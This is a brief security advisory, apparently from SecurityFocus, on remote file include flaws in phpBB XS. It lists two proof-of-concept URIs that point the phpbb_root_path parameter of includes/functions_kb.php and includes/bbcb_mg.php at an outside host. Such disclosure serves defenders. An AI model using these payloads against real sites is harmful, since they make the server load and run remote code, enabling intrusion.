PhpBB XS Multiple Remote File Include Vulnerabilities

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/includes/functions_kb.php?phpbb_root_path=http://www.example.com
http://www.example.com/[path]/includes/bbcb_mg.php?phpbb_root_path=http://www.example.com


 

Privacy Statement
Copyright 2010, SecurityFocus